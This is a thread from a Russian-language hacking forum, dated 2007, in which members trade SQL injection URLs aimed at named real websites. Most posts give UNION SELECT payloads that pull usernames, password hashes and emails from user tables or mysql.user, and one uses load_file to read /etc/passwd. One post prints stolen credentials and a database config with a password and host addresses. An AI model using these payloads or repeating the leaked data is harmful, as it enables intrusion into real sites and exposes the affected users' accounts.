04.02.2007, 23:44
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
С нами:
10787308
Репутация:
409
|
|
Сообщение от ice1k
Ну так то да, но мало ли - может ему не только юзеры нужны  хм...INFORMATION_SCHEMA.TABLES юзал тока поимел какую то херь..типа charatacter set...ща алкоголь из башки выйдет..обдумаю
а по поводу префикса таблиц то пробовал ds_Esir ...промахнулся
P.S понял теперь как INFORMATION_SCHEMA.TABLES читать 
Последний раз редактировалось злюка; 05.02.2007 в 08:30..
|
|
|
04.02.2007, 12:39
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
_http://inform.com.ua/index.php?s=52'
_http://www.buhgalteria.com.ua/Answer.html?id=2869'
_http://www.ukraina.net.pl/index.php?art=pokaz&num=1241'
_http://www.promsvyaz.kiev.ua/index.php?menu_word=4&command=more&id_news=42&lang =1'
_http://www.video.lg.ua/search.html?beg='
_http://www.el-drive.com.ua/forum/Profile.php?UsId='
|
|
|
|
04.02.2007, 15:36
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
http://www.beatles.ru/postman/club_birthday.asp?m=2&d=1+or+1=(SELECT+TOP+1+cast( user_name+as+nvarchar)%2B%27%3A%27%2Bcast(user_ema il+as+nvarchar)%2B%27%3A%27%2Bcast(user_Password+a s+nvarchar)+from+users%20where%20user_id=58)--
А есть какой-нибудь способ вывести инфу со всех пользователей сразу?
|
|
|
|
05.02.2007, 17:37
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами:
10358246
Репутация:
378
|
|
Zhaba.ru
http://zhaba.ru/flash-games.php?page=-1+union+select+1,username,user_password,4,5,6,7,8, 9,user(),11+from+phpbb_users+where+user_id=3/*
Tamizdat.org
http://www.tamizdat.org/article.php?id=99999+union+select+1,2,user,4,5,6,7 ,password,9,10,11,12,13+from+mysql.user/*
AllAboutJazz.com
http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),15,16,17,18,19,20,21,version(),23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,database(),39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,current_date (),73,74,75,76,77/*
Fujirangefinder.com
http://fujirangefinder.com/user.php?id=-1+union+select+1,current_date(),user(),4,user(),ve rsion(),database(),8,9,10,11/*
Fotoforma.ru
http://www.fotoforma.ru/texts.php?ID=-1+union+select+1,2,3,4,5/*
Cineclassic.com
http://www.cineclassic.com/fiche.php?film_id=999+union+select+1,2,3,4,user(), 6,7,database(),9,10,11,version(),13,current_date() ,15,16,17,18,19,20,21,22,23/*
|
|
|
|
05.02.2007, 20:45
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
С нами:
10396497
Репутация:
56
|
|
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*
посоветуйте что дальше можно зделать!
|
|
|
|
06.02.2007, 00:40
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
Сообщение от Lancellot
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*
посоветуйте что дальше можно зделать!
Что тут советовать бери и расшифровывай
http://blogsforlearning.msu.edu/articles/view.php?id=-1+union+select+1,2,3,concat(user_login,char(58),us er_pass,char(58),user_email),5,6,7,8,9+from+wp_use rs/*
|
|
|
|
05.02.2007, 23:26
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Пост пропустил)))
http://www.crdf.ru/?id=15'
http://www.pratt.duke.edu/news/?id=-1'
не могу кол-во ст подобрать
|
|
|
|
06.02.2007, 04:06
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами:
10225766
Репутация:
2062
|
|
нашел на 777.biz.ua инъекцию, а потом с огромной помощью c411k и _-[A.M.D]HiM@S-_ была добыта разнообразная инфа.
Код:
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user+limit+4,3
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9+from+mysql.user/*
admin:kRX.3VVi1kp0Q
Anna:3uqauoqXBOygw
Lina:GkgDkPlYVkkiM: zaq1qaz
Tina:gpL6.5zhbQLic
Yuve:1EmcyGHTQK5xY
frukt:6fsFeWu7hSTzA
vini:ijZtKQgJtn7JM
luke:BWilMcUu7Zq.Y
bandit:_UWF9hYsfZlVY
хороший кусок конфига
$myCon['user']="frukt";
$myCon['password']="zaq1";
//$myCon['host']="82.144.221.59";
//$myCon['host']="213.186.114.123";
$myCon['host']="localhost";
$myCon['db']="777_db1";
главные базы
lucky\_mychat1
eximstats
horde
leechprotect
lucky\_db1
[+] _-[A.M.D]HiM@S-_
[+] c411k
Последний раз редактировалось Thanat0z; 22.02.2007 в 03:07..
|
|
|
|
06.02.2007, 15:02
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами:
10358246
Репутация:
378
|
|
Sklon.ru
http://www.sklon.ru/print.php?p=world-news&m=menu1&l=ru&view=-1+union+select+1,2,3,table_name,5,6,7+from+INFORMA TION_SCHEMA.TABLES+limit+71,72/*
Venus.ru
http://www.venus.ru/news.php?id=-1+union+select+1,2,3,4,user(),6,version(),database (),9,10,11/*
ppkp.ru
http://www.pkpp.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Ezgulik.org
http://www.ezgulik.org/news.php?id=-1+union+select+1,2,version(),user(),5,6/*
|
|
|
|
06.02.2007, 17:10
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
http://football.sport.com.ua/news.phtml?id=20238888+union+select+concat(usernam e,char(58),password),2,3,4,5+from+users/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
